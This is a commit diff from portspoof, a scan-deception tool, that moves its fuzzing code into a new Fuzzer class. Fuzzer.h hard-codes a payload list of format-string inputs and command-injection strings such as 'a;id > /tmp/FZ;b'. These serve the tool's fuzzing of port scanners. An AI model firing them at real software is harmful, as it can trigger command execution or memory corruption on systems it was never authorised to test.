mirror of
https://github.com/drk1wi/portspoof.git
synced 2024-06-28 09:41:36 +00:00
major update
This commit is contained in:
parent
c4a2632fa4
commit
43eceb605d
@ -8,12 +8,9 @@ Configuration::Configuration()
|
||||
bind_ip=std::string();
|
||||
port=DEFAULT_PORT;
|
||||
opts=0;
|
||||
|
||||
|
||||
nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);
|
||||
fuzzpayload_file = std::string(FUZZ_FILE_PAYLOAD);
|
||||
counter=0;
|
||||
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
@ -28,13 +25,14 @@ void Configuration::usage(void)
|
||||
"Portspoof - service signature obfuscator.\n\n"
|
||||
"-i bind to a user defined IP address\n"
|
||||
"-p bind to a user defined PORT number\n"
|
||||
"-f custom signture file\n"
|
||||
"-s custom signture file\n"
|
||||
"-c configuration file\n"
|
||||
"-l log port scanning alerts to a file\n"
|
||||
"-d disable syslog\n"
|
||||
"-v be verbose\n"
|
||||
"-x fuzz\n"
|
||||
"-y nmap wrap fuzz\n"
|
||||
"-f read fuzz payload list\n"
|
||||
"-1 generate fuzzing payloads\n"
|
||||
"-n nmap wrap fuzz signatures\n"
|
||||
"-h display this help and exit\n\n"
|
||||
"Without any OPTION - use default values and continue\n");
|
||||
|
||||
@ -46,7 +44,7 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
int ch;
|
||||
extern char *__progname;
|
||||
|
||||
while ((ch = getopt(argc, argv,"l:i:p:f:c:y:x:dvh")) != -1) {
|
||||
while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
|
||||
switch (ch) {
|
||||
case 'i':
|
||||
this->bind_ip = std::string(optarg);
|
||||
@ -56,7 +54,7 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
this->port = atoi(optarg);
|
||||
this->opts[OPT_PORT]=1;
|
||||
break;
|
||||
case 'f':
|
||||
case 's':
|
||||
this->signaturefile = std::string(optarg);
|
||||
this->opts[OPT_SIG_FILE]=1;
|
||||
|
||||
@ -79,16 +77,28 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
this->logfile = std::string(optarg);
|
||||
fprintf(stdout,"-> Using log file %s\n",this->logfile.c_str());
|
||||
break;
|
||||
case 'x':
|
||||
this->opts[OPT_FUZZ]=1;
|
||||
case 'f':
|
||||
this->opts[OPT_FUZZ_WORDLIST]=1;
|
||||
this->fuzzpayload_file=std::string(optarg);
|
||||
fprintf(stdout,"-> Fuzzing mode!\n");
|
||||
fprintf(stdout,"-> Reading fuzzing payloads from a file!\n");
|
||||
break;
|
||||
case 'y':
|
||||
case 'n':
|
||||
this->opts[OPT_FUZZ_NMAP]=1;
|
||||
this->nmapfuzzsignatures_file=std::string(optarg);
|
||||
fprintf(stdout,"-> NMAP Fuzzing mode!\n");
|
||||
fprintf(stdout,"-> NMAP wrapper mode!\n");
|
||||
break;
|
||||
case '1':
|
||||
this->opts[OPT_FUZZ_INTERNAL]=1;
|
||||
fprintf(stdout,"-> Generate fuzzing payloads!\n");
|
||||
break;
|
||||
case '2':
|
||||
this->opts[OPT_NOT_NMAP_SCANNER]=1;
|
||||
fprintf(stdout,"-> Switching to simple reply mode (anything apart from Nmap)!\n");
|
||||
break;
|
||||
case '3':
|
||||
this->opts[OPT_FUZZ_RANDOM]=1;
|
||||
fprintf(stdout,"-> Random int fuzzing!\n");
|
||||
break;
|
||||
case 'h':
|
||||
this->usage();
|
||||
break;
|
||||
@ -105,6 +115,10 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
fprintf(stdout,"-> No parameters - using default values.\n");
|
||||
}
|
||||
|
||||
if(this->getConfigValue(OPT_FUZZ_NMAP) ||this->getConfigValue(OPT_FUZZ_WORDLIST) || this->getConfigValue(OPT_FUZZ_INTERNAL))
|
||||
this->fuzzer=new Fuzzer(this);
|
||||
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
@ -116,6 +130,15 @@ std::string Configuration::getSignatureFile()
|
||||
{
|
||||
return this->signaturefile;
|
||||
|
||||
}
|
||||
std::string Configuration::getNmapfuzzSignaturesFile()
|
||||
{
|
||||
return this->nmapfuzzsignatures_file;
|
||||
}
|
||||
std::string Configuration::getFuzzPayloadFile()
|
||||
{
|
||||
return this->fuzzpayload_file;
|
||||
|
||||
}
|
||||
std::string Configuration::getLogFile()
|
||||
{
|
||||
@ -135,7 +158,7 @@ unsigned short int Configuration::getPort()
|
||||
std::vector<char> Configuration::mapPort2Signature(unsigned short port)
|
||||
{
|
||||
/*
|
||||
if(this->opts&OPT_FUZZ)
|
||||
if(this->opts&OPT_FUZZ_WORDLIST
|
||||
{
|
||||
|
||||
std::string input_line;
|
||||
@ -148,10 +171,10 @@ std::vector<char> Configuration::mapPort2Signature(unsigned short port)
|
||||
|
||||
}
|
||||
*/
|
||||
if(this->opts[OPT_FUZZ_NMAP])
|
||||
if(this->opts[OPT_FUZZ_NMAP] || this->opts[OPT_FUZZ_INTERNAL] || this->opts[OPT_FUZZ_WORDLIST])
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
result_vector=this->GetFUZZ();
|
||||
result_vector=this->fuzzer->GetFUZZ();
|
||||
return result_vector;
|
||||
}
|
||||
else
|
||||
@ -257,81 +280,3 @@ bool Configuration::readConfigFile()
|
||||
|
||||
}
|
||||
|
||||
|
||||
bool Configuration::PrepareFuzzer()
|
||||
{
|
||||
|
||||
this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
|
||||
if ( this->fp_payloads == NULL) {
|
||||
fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
/////
|
||||
|
||||
FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
|
||||
if (fp == NULL) {
|
||||
fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
while (fgets(buf_file, BUFSIZE, fp))
|
||||
nmapfuzzsignatures.push_back(std::string(buf_file));
|
||||
fclose(fp);
|
||||
|
||||
fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
std::vector<char> Configuration::GetFUZZ()
|
||||
{
|
||||
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
std::string input_wrapped,input_wrapped2;
|
||||
std::vector<char> result_vector;
|
||||
|
||||
|
||||
if(this->counter%this->nmapfuzzsignatures.size()==0)
|
||||
{
|
||||
|
||||
|
||||
if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
|
||||
{
|
||||
fprintf(stdout,"EOF of payload file\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
this->input_line=std::string(buf_file);
|
||||
this->input_line.erase(input_line.size() - 1);//remove \n
|
||||
|
||||
}
|
||||
|
||||
|
||||
input_wrapped=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
|
||||
input_wrapped2=Utils::unescape(input_wrapped);
|
||||
|
||||
|
||||
this->counter++;
|
||||
|
||||
for(int i=0; i<input_wrapped2.length();i++)
|
||||
result_vector.push_back(input_wrapped2[i]);
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
}
|
||||
|
||||
/*
|
||||
std::string input_line;
|
||||
std::getline(std::cin, input_line);
|
||||
|
||||
|
||||
for(int i=0; i<input_line.length();i++)
|
||||
result_vector.push_back(input_line[i]);
|
||||
return result_vector;
|
||||
*/
|
@ -8,7 +8,7 @@
|
||||
#define LOG_FILE "portspoof.log"
|
||||
#define CONF_FILE "portspoof.conf"
|
||||
#define SIGNATURE_FILE "signatures"
|
||||
#define OPT_FUZZ 1
|
||||
#define OPT_FUZZ_WORDLIST 1
|
||||
#define OPT_IP 2
|
||||
#define OPT_PORT 3
|
||||
#define OPT_DEBUG 4
|
||||
@ -17,7 +17,9 @@
|
||||
#define OPT_SYSLOG_DIS 7
|
||||
#define OPT_CONFIG_FILE 8
|
||||
#define OPT_FUZZ_NMAP 9
|
||||
|
||||
#define OPT_FUZZ_INTERNAL 10
|
||||
#define OPT_NOT_NMAP_SCANNER 11
|
||||
#define OPT_FUZZ_RANDOM 12
|
||||
|
||||
#define MAX_PORTS 65535
|
||||
|
||||
@ -48,6 +50,9 @@ using namespace std;
|
||||
typedef map < unsigned short, std::vector<char> > Port_Signature_Map;
|
||||
typedef vector < string > Raw_Signatures_Vector;
|
||||
typedef vector < string > Nmap_Fuzz_Vector;
|
||||
class Fuzzer;
|
||||
|
||||
#include "Fuzzer.h"
|
||||
|
||||
|
||||
class Configuration {
|
||||
@ -57,39 +62,31 @@ class Configuration {
|
||||
std::string logfile;
|
||||
std::string bind_ip;
|
||||
unsigned short int port;
|
||||
bitset<10> opts;
|
||||
|
||||
unsigned short ifuzz;
|
||||
bitset<20> opts;
|
||||
Fuzzer* fuzzer;
|
||||
std::string nmapfuzzsignatures_file;
|
||||
std::string fuzzpayload_file;
|
||||
Port_Signature_Map portsignatureemap;
|
||||
Raw_Signatures_Vector rawsignatures;
|
||||
|
||||
//fuzzing part
|
||||
std::string nmapfuzzsignatures_file;
|
||||
std::string fuzzpayload_file;
|
||||
Nmap_Fuzz_Vector nmapfuzzsignatures;
|
||||
FILE *fp_payloads;
|
||||
int counter;
|
||||
std::string input_line;
|
||||
|
||||
public:
|
||||
Configuration();
|
||||
|
||||
void usage(void);
|
||||
bool processArgs(int argc, char** argv);
|
||||
bool readConfigFile();
|
||||
std::vector<char> mapPort2Signature(unsigned short port);
|
||||
void usage(void);
|
||||
bool getConfigValue(int value);
|
||||
bool processSignatureFile();
|
||||
|
||||
//getters
|
||||
std::string getConfigFile();
|
||||
std::string getSignatureFile();
|
||||
std::string getLogFile();
|
||||
std::string getBindIP();
|
||||
std::string getNmapfuzzSignaturesFile();
|
||||
std::string getFuzzPayloadFile();
|
||||
bool getConfigValue(int value);
|
||||
unsigned short int getPort();
|
||||
bool processSignatureFile();
|
||||
|
||||
//fuzzing part
|
||||
bool PrepareFuzzer();
|
||||
std::vector<char> GetFUZZ();
|
||||
|
||||
|
||||
};
|
||||
|
||||
|
182
src/Fuzzer.cpp
Normal file
182
src/Fuzzer.cpp
Normal file
@ -0,0 +1,182 @@
|
||||
#include "Fuzzer.h"
|
||||
|
||||
Fuzzer::Fuzzer()
|
||||
{
|
||||
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
Fuzzer::Fuzzer(Configuration* configuration)
|
||||
{
|
||||
|
||||
this->configuration = configuration;
|
||||
this->nmapfuzzsignatures_file = configuration->getNmapfuzzSignaturesFile();
|
||||
this->fuzzpayload_file = configuration->getFuzzPayloadFile();
|
||||
this->counter=0;
|
||||
this->payload_counter=0;
|
||||
this->PrepareFuzzer();
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
bool Fuzzer::PrepareFuzzer()
|
||||
{
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
|
||||
{
|
||||
|
||||
this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
|
||||
if ( this->fp_payloads == NULL) {
|
||||
fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
}
|
||||
/////
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
|
||||
{
|
||||
|
||||
FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
|
||||
if (fp == NULL) {
|
||||
fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
while (fgets(buf_file, BUFSIZE, fp))
|
||||
nmapfuzzsignatures.push_back(std::string(buf_file));
|
||||
fclose(fp);
|
||||
fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
|
||||
|
||||
}
|
||||
|
||||
return 0;
|
||||
|
||||
}
|
||||
|
||||
std::vector<char> Fuzzer::intToBytes(int paramInt)
|
||||
{
|
||||
vector<char> arrayOfByte(4);
|
||||
for (int i = 0; i < 4; i++)
|
||||
arrayOfByte[3 - i] = (paramInt >> (i * 8));
|
||||
return arrayOfByte;
|
||||
}
|
||||
|
||||
|
||||
std::vector<char> Fuzzer::shortToBytes(unsigned short paramInt)
|
||||
{
|
||||
vector<char> arrayOfByte(2);
|
||||
for (int i = 0; i < 2; i++)
|
||||
arrayOfByte[1 - i] = (paramInt >> (i * 4));
|
||||
return arrayOfByte;
|
||||
}
|
||||
|
||||
std::vector<char> Fuzzer::GenerateFuzzPayload()
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
std::string str;
|
||||
|
||||
/*
|
||||
for(int i=0;i<255;i++)
|
||||
result_vector.push_back(i);
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_RANDOM))
|
||||
{
|
||||
this->payload_counter++;
|
||||
return this->shortToBytes((unsigned short)this->payload_counter);
|
||||
|
||||
}
|
||||
*/
|
||||
|
||||
if(this->payload_counter<10)
|
||||
{
|
||||
for(int i=0;i<4000*(this->payload_counter+1);i++)
|
||||
result_vector.push_back(*(fuzz_oracle[0]));
|
||||
}
|
||||
else
|
||||
{
|
||||
|
||||
str=std::string(fuzz_oracle[this->payload_counter-9]);
|
||||
result_vector=Utils::str2vector(str);
|
||||
}
|
||||
|
||||
this->payload_counter++;
|
||||
|
||||
if(this->payload_counter>=25)
|
||||
this->payload_counter=0;
|
||||
|
||||
return result_vector;
|
||||
|
||||
}
|
||||
|
||||
std::vector<char> Fuzzer::GetFUZZ()
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
|
||||
{
|
||||
|
||||
|
||||
if(this->counter%this->nmapfuzzsignatures.size()==0)
|
||||
{
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
std::string str;
|
||||
|
||||
if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
|
||||
{
|
||||
fprintf(stdout,"EOF of payload file\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
str=std::string(buf_file);
|
||||
str.erase(str.size() - 1);//remove \n
|
||||
this->input_line=Utils::str2vector(str);
|
||||
|
||||
}
|
||||
|
||||
this->counter++;
|
||||
|
||||
}
|
||||
else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
|
||||
{
|
||||
result_vector=this->GenerateFuzzPayload();
|
||||
}
|
||||
else
|
||||
fprintf(stdout,"Fuzz - shouldn't be here...\n");
|
||||
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
|
||||
{
|
||||
|
||||
if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
|
||||
result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
|
||||
else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
|
||||
result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],result_vector);
|
||||
|
||||
result_vector=Utils::unescape(result_vector);
|
||||
|
||||
}
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
/*
|
||||
std::string input_line;
|
||||
std::getline(std::cin, input_line);
|
||||
|
||||
|
||||
for(int i=0; i<input_line.length();i++)
|
||||
result_vector.push_back(input_line[i]);
|
||||
return result_vector;
|
||||
*/
|
75
src/Fuzzer.h
Normal file
75
src/Fuzzer.h
Normal file
@ -0,0 +1,75 @@
|
||||
#ifndef FUZZER_H
|
||||
#define FUZZER_H
|
||||
|
||||
#include <string>
|
||||
#include <stdio.h>
|
||||
#include <ctype.h>
|
||||
#include <pcap.h>
|
||||
#include <map>
|
||||
#include <vector>
|
||||
#include <sstream>
|
||||
#include <unistd.h>
|
||||
#include <algorithm>
|
||||
#include <iostream>
|
||||
#include <ctime>
|
||||
#include <pthread.h>
|
||||
#include <iostream>
|
||||
#include <string>
|
||||
#include <iostream>
|
||||
#include <fstream>
|
||||
#include <sstream>
|
||||
|
||||
#include "Utils.h"
|
||||
#include "Configuration.h"
|
||||
|
||||
using namespace std;
|
||||
|
||||
|
||||
static const char* const fuzz_oracle[]=
|
||||
{
|
||||
"A",
|
||||
"%n%n%n%n%n",
|
||||
"%%20n",
|
||||
"%n%p%s%d%x",
|
||||
"%.1024d",
|
||||
"%.2049d",
|
||||
"-1",
|
||||
"32767",
|
||||
"65535",
|
||||
"-2147483647",
|
||||
"0xffffffff",
|
||||
"a|id > /tmp/FZ|b",
|
||||
"a`id > /tmp/FZ`b",
|
||||
"a'id > /tmp/FZ'b",
|
||||
"a;id > /tmp/FZ;b",
|
||||
"a&&id > /tmp/FZ&&b"
|
||||
};
|
||||
|
||||
|
||||
class Fuzzer{
|
||||
private:
|
||||
|
||||
std::string nmapfuzzsignatures_file;
|
||||
std::string fuzzpayload_file;
|
||||
Nmap_Fuzz_Vector nmapfuzzsignatures;
|
||||
FILE *fp_payloads;
|
||||
std::vector<char> input_line;
|
||||
Configuration* configuration;
|
||||
int counter;
|
||||
int payload_counter;
|
||||
int nmapfuzzsignatures_size;
|
||||
|
||||
public:
|
||||
Fuzzer();
|
||||
Fuzzer(Configuration* configuration);
|
||||
bool processSignatureFile();
|
||||
std::vector<char> GetFUZZ();
|
||||
std::vector<char> GenerateFuzzPayload();
|
||||
std::vector<char> intToBytes(int paramInt);
|
||||
std::vector<char> shortToBytes(unsigned short paramInt);
|
||||
|
||||
bool PrepareFuzzer();
|
||||
};
|
||||
|
||||
|
||||
#endif
|
@ -44,15 +44,42 @@ void Utils::hexdump(void *mem, unsigned int len)
|
||||
}
|
||||
}
|
||||
|
||||
string Utils::wrapNMAP(string wrapper,string payload)
|
||||
std::vector<char> Utils::wrapNMAP(string wrapper,std::vector<char> payload)
|
||||
{
|
||||
std::stringstream ss;
|
||||
stringstream ss;
|
||||
string str;
|
||||
std::vector<char> result_vector;
|
||||
|
||||
ss<<wrapper.substr(0,wrapper.find("__FUZZ__"));
|
||||
ss<<payload;
|
||||
str=ss.str();
|
||||
|
||||
for(int i=0; i<str.length();i++)
|
||||
result_vector.push_back(str[i]);
|
||||
|
||||
result_vector.insert(result_vector.end(),payload.begin(),payload.end());
|
||||
|
||||
ss.str("");
|
||||
ss<<wrapper.substr(wrapper.find("__FUZZ__")+strlen("__FUZZ__"),wrapper.size());
|
||||
return ss.str();
|
||||
|
||||
str=ss.str();
|
||||
|
||||
for(int i=0; i<str.length();i++)
|
||||
result_vector.push_back(str[i]);
|
||||
|
||||
return result_vector;
|
||||
}
|
||||
|
||||
std::vector<char> Utils::str2vector( std::string& s)
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
|
||||
for(int i=0; i<s.length();i++)
|
||||
result_vector.push_back(s[i]);
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
}
|
||||
int Utils::isNumeric (const char * s)
|
||||
{
|
||||
if (s == NULL || *s == '\0' || isspace(*s))
|
||||
@ -63,10 +90,10 @@ int Utils::isNumeric (const char * s)
|
||||
}
|
||||
|
||||
|
||||
std::string Utils::unescape(string& s)
|
||||
std::vector<char> Utils::unescape(std::vector<char> & s)
|
||||
{
|
||||
string res;
|
||||
string::const_iterator it = s.begin();
|
||||
std::vector<char> res;
|
||||
vector<char>::const_iterator it = s.begin();
|
||||
while (it != s.end())
|
||||
{
|
||||
char c = *it++;
|
||||
@ -75,13 +102,15 @@ std::string Utils::unescape(string& s)
|
||||
switch (*it++) {
|
||||
case 'n': c = '\n'; break;
|
||||
case 'r': c = '\r'; break;
|
||||
case 't': c = '\t'; break;
|
||||
|
||||
// all other escapes
|
||||
default:
|
||||
// invalid escape sequence - skip it. alternatively you can copy it as is, throw an exception...
|
||||
continue;
|
||||
}
|
||||
}
|
||||
res += c;
|
||||
res.push_back(c);
|
||||
}
|
||||
|
||||
return res;
|
||||
|
@ -11,6 +11,7 @@
|
||||
#include <string>
|
||||
#include <sstream>
|
||||
#include <iostream>
|
||||
#include <vector>
|
||||
|
||||
|
||||
#ifndef HEXDUMP_COLS
|
||||
@ -27,8 +28,10 @@ class Utils {
|
||||
static void hexdump(void *mem, unsigned int len);
|
||||
static int isNumeric (const char * s);
|
||||
static char* get_substring_value(char* str);
|
||||
static string wrapNMAP(string wrapper,string payload);
|
||||
static std::string unescape( string& s);
|
||||
static std::vector<char> wrapNMAP(string wrapper,std::vector<char> payload);
|
||||
static std::vector<char> unescape( std::vector<char>& s);
|
||||
static std::vector<char> str2vector( std::string& s);
|
||||
|
||||
|
||||
};
|
||||
|
||||
|
BIN
src/a.out
BIN
src/a.out
Binary file not shown.
Binary file not shown.
@ -69,8 +69,8 @@ void nonblock(int sockfd)
|
||||
void* process_connection(void *arg)
|
||||
{
|
||||
int tid = *((int*)(&arg));
|
||||
int len,i;
|
||||
std:string str;
|
||||
//int len;
|
||||
string str;
|
||||
char buffer;
|
||||
int original_port=DEFAULT_PORT;
|
||||
int n = 0;
|
||||
@ -82,7 +82,7 @@ void* process_connection(void *arg)
|
||||
while(1) {
|
||||
|
||||
sleep(1);
|
||||
for(i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
{
|
||||
|
||||
if(threads[tid].clients[i] != 0)
|
||||
@ -90,7 +90,11 @@ void* process_connection(void *arg)
|
||||
|
||||
timestamp = time(NULL);
|
||||
|
||||
n = recv(threads[tid].clients[i], &buffer,1, 0);
|
||||
if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
|
||||
n = 1; // just reply...
|
||||
else
|
||||
n = recv(threads[tid].clients[i], &buffer,1, 0);
|
||||
|
||||
|
||||
// deal with different recv buffer size
|
||||
if(n == 0){
|
||||
@ -127,7 +131,6 @@ void* process_connection(void *arg)
|
||||
threads[tid].client_count--;
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
|
||||
}
|
||||
else if(n < 0){
|
||||
|
||||
@ -177,7 +180,6 @@ void* process_connection(void *arg)
|
||||
else
|
||||
{
|
||||
|
||||
|
||||
#ifdef OSX
|
||||
// BSD
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
@ -208,16 +210,15 @@ void* process_connection(void *arg)
|
||||
int buffertosendsize=vectsignature.size();
|
||||
char* buffertosend= (char*)malloc(buffertosendsize);
|
||||
|
||||
for(int i=0; i<buffertosendsize;i++)
|
||||
buffertosend[i]=vectsignature[i];
|
||||
for(int j=0; j<buffertosendsize;j++)
|
||||
buffertosend[j]=vectsignature[j];
|
||||
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
{
|
||||
|
||||
|
||||
fprintf(stdout,"signature sent -> ");
|
||||
unsigned int t=0;
|
||||
for(;t<buffertosendsize;t++)
|
||||
for(int t=0;t<buffertosendsize;t++)
|
||||
{
|
||||
if(*(buffertosend+t)==0)
|
||||
fprintf(stdout,"\\00");
|
||||
|
@ -12,7 +12,7 @@ void log_create(const char* file){
|
||||
|
||||
FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
|
||||
if (fp == NULL) {
|
||||
FILE *fp = fopen(configuration->getLogFile().c_str(), "w");
|
||||
fp = fopen(configuration->getLogFile().c_str(), "w");
|
||||
}
|
||||
|
||||
fclose(fp);
|
||||
|
@ -121,25 +121,25 @@ int main(int argc, char** argv){
|
||||
|
||||
/* Find the properties for the device */
|
||||
if (pcap_lookupnet(configuration->getDevice().c_str(), &net, &mask, errbuf) == -1) {
|
||||
printf("Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
|
||||
fprintf(stdout,"Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
|
||||
net = 0;
|
||||
mask = 0;
|
||||
}
|
||||
|
||||
//promisc mode.
|
||||
if ( (descr = pcap_open_live(configuration->getDevice().c_str(), BUFSIZ, 1, 512, errbuf)) == NULL){
|
||||
printf("ERROR: %s\n", errbuf);
|
||||
fprintf(stdout,"ERROR: %s\n", errbuf);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
cout<<"Promisc mode set"<<endl;
|
||||
|
||||
if (pcap_compile(descr, &fp, configuration->getFilter().c_str(), 0, net) == -1) {
|
||||
printf("Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
fprintf(stdout,"Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
exit(1);
|
||||
}
|
||||
if (pcap_setfilter(descr, &fp) == -1) {
|
||||
printf("Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
fprintf(stdout,"Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
@ -84,7 +84,7 @@ int main(int argc, char **argv)
|
||||
|
||||
int sockd,newsockfd;
|
||||
int addrlen;
|
||||
int pid;
|
||||
//int pid;
|
||||
struct sockaddr_in my_name, peer_name;
|
||||
int status;
|
||||
|
||||
@ -99,7 +99,8 @@ int main(int argc, char **argv)
|
||||
|
||||
if(configuration->readConfigFile())
|
||||
exit(1);
|
||||
|
||||
|
||||
/*
|
||||
if(configuration->getConfigValue(OPT_FUZZ_NMAP))
|
||||
{
|
||||
if(configuration->PrepareFuzzer())
|
||||
@ -112,7 +113,7 @@ int main(int argc, char **argv)
|
||||
fprintf(stdout,"-> Preparing fuzzer!\n");
|
||||
|
||||
}
|
||||
|
||||
*/
|
||||
|
||||
|
||||
//check log file
|
||||
|
@ -279,6 +279,8 @@ char * fill_specialchars(char * str,int* param_len, int start_offset,int end_off
|
||||
int dot='.';
|
||||
int newline='n';
|
||||
int creturn='r';
|
||||
int tab='t';
|
||||
|
||||
|
||||
char* tmp; // tmp string for merging
|
||||
int tmplen=end_offset-start_offset;
|
||||
@ -326,6 +328,12 @@ char * fill_specialchars(char * str,int* param_len, int start_offset,int end_off
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==tab )
|
||||
{
|
||||
tmp[tmpi]='\t';
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==dot && i!=start_offset && str[i-1]!=bslash)
|
||||
{
|
||||
|
||||
|
1
src/src/.deps/connection.Po
Normal file
1
src/src/.deps/connection.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
231
src/src/.deps/connection.Tpo
Normal file
231
src/src/.deps/connection.Tpo
Normal file
@ -0,0 +1,231 @@
|
||||
connection.o connection.o: connection.c connection.h \
|
||||
/usr/include/sys/socket.h /usr/include/sys/types.h \
|
||||
/usr/include/sys/appleapiopts.h /usr/include/sys/cdefs.h \
|
||||
/usr/include/sys/_symbol_aliasing.h \
|
||||
/usr/include/sys/_posix_availability.h /usr/include/machine/types.h \
|
||||
/usr/include/i386/types.h /usr/include/i386/_types.h \
|
||||
/usr/include/sys/_types.h /usr/include/machine/_types.h \
|
||||
/usr/include/machine/endian.h /usr/include/i386/endian.h \
|
||||
/usr/include/sys/_endian.h /usr/include/libkern/_OSByteOrder.h \
|
||||
/usr/include/libkern/i386/_OSByteOrder.h /usr/include/sys/_structs.h \
|
||||
/usr/include/machine/_param.h /usr/include/i386/_param.h \
|
||||
/usr/include/Availability.h /usr/include/AvailabilityInternal.h \
|
||||
/usr/include/assert.h /usr/include/net/if.h /usr/include/net/if_var.h \
|
||||
/usr/include/stdint.h /usr/include/sys/time.h /usr/include/time.h \
|
||||
/usr/include/_types.h /usr/include/_structs.h \
|
||||
/usr/include/sys/_select.h /usr/include/sys/queue.h \
|
||||
/usr/include/sys/ioctl.h /usr/include/sys/ttycom.h \
|
||||
/usr/include/sys/ioccom.h /usr/include/sys/filio.h \
|
||||
/usr/include/sys/sockio.h /usr/include/sys/stat.h \
|
||||
/usr/include/netinet/in.h /usr/include/netinet6/in6.h \
|
||||
/usr/include/sys/sysctl.h /usr/include/sys/ucred.h \
|
||||
/usr/include/sys/param.h /usr/include/sys/syslimits.h \
|
||||
/usr/include/machine/param.h /usr/include/i386/param.h \
|
||||
/usr/include/i386/_param.h \
|
||||
/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/limits.h \
|
||||
/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/syslimits.h \
|
||||
/usr/include/limits.h /usr/include/machine/limits.h \
|
||||
/usr/include/i386/limits.h /usr/include/i386/_limits.h \
|
||||
/usr/include/sys/signal.h /usr/include/machine/signal.h \
|
||||
/usr/include/i386/signal.h /usr/include/i386/_structs.h \
|
||||
/usr/include/machine/_structs.h /usr/include/mach/i386/_structs.h \
|
||||
/usr/include/bsm/audit.h /usr/include/mach/port.h \
|
||||
/usr/include/mach/boolean.h /usr/include/mach/machine/boolean.h \
|
||||
/usr/include/mach/i386/boolean.h /usr/include/mach/machine/vm_types.h \
|
||||
/usr/include/mach/i386/vm_types.h /usr/include/mach/i386/vm_param.h \
|
||||
/usr/include/sys/proc.h /usr/include/sys/select.h \
|
||||
/usr/include/sys/lock.h /usr/include/sys/event.h /usr/include/sys/vm.h \
|
||||
/usr/include/netdb.h /usr/include/fcntl.h /usr/include/sys/fcntl.h \
|
||||
/usr/include/err.h /usr/include/errno.h /usr/include/sys/errno.h \
|
||||
